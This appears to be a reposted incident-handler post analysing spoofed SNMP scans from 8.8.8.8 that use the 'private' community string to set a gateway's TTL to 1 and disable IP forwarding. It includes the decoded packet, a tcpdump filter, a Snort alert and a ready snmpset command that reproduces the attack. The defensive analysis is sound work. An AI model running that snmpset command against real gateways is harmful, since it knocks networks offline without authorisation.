2nd Update
All the packet captures we received so far show the same behavior. The scans are sequential, so it is fair to assume that this is an internet wide scan. We have yet to find a vulnerable system, and I don't think that vulnerable configurations are very common but please let me know if you know of widely used systems that allow for these SNMP commands. This could also just be a troll checking "what is happening if I send this".
1st Update
Thanks to James for sending us some packets. Unlike suggested earlier, this doesn't look like a DoS against Google, but more like a DoS against vulnerable gateways. The SNMP command is actually a "set" command using the default read-write community string "private". If successful, it should:
- set the default TTL to 1, which would make it impossible for the gateway to connect to other systems that are not on the same link-layer network.
- turn off IP forwarding.
Still playing with this, and so far, I haven't managed to "turn off" any of my test systems. If you want to play, here are some of the details:
The SNMP payload of the packets reported by James:
Simple Network Management Protocol
version: version-1 (0)
community: private
data: set-request (3)
set-request
request-id: 1821915375
error-status: noError (0)
error-index: 0
variable-bindings: 2 items
1.3.6.1.2.1.4.2.0:
Object Name: 1.3.6.1.2.1.4.2.0 (iso.3.6.1.2.1.4.2.0)
Value (Integer32): 1
1.3.6.1.2.1.4.1.0:
Object Name: 1.3.6.1.2.1.4.1.0 (iso.3.6.1.2.1.4.1.0)
Value (Integer32): 2
The snmp set command I am using to re-create the traffic:
snmpset -v 1 -c private [target ip] .1.3.6.1.2.1.4.2.0 int 1 .1.3.6.1.2.1.4.1.0 int 2
any insight is welcome. Still working on this and there may be more to it then I see now (or less...)
--- end of update ---
We are receiving some reports about SNMP scans that claim to originate from 8.8.8.8 (Google's public recursive DNS server). This is likely part of an attempt to launch a DDoS against Google by using SNMP as an amplifier/reflector.
Please let us know if you see any of the packet. The source IP should be 8.8.8.8 and the target port should be 161 UDP. For example in tcpdump:
tcpdump -s0 -w /tmp/googlensmp dst port 161 and src host 8.8.8.8
Thanks to James for sending us a snort alert triggered by this:
Sep 15 11:07:07 node snort[25421]: [1:2018568:1] ET CURRENT_EVENTS Possible Inbound SNMP Router DoS (TTL 1) [Classification: Attempted Denial of Service] [Priority: 2] {UDP} 8.8.8.8:47074 -> x.x.251.62:161
So far, it does not look like service to Google's DNS server is degraded.
'Security_News > 해외보안소식' 카테고리의 다른 글
iOS 8, 소유자만 기기 데이터 접근할 수 있어 (0) | 2014.09.21 |
---|---|
이볼루션 온라인 블랙 마켓 급성장 (0) | 2014.09.21 |
표적 공격에 사용되는 64 비트 "MIRAS"확인 (0) | 2014.09.19 |
다양 화하는 랜섬웨어 그 수법을 해설 (0) | 2014.09.19 |
미국 전력망, 사이버공격에 중단되지 않아 (0) | 2014.09.18 |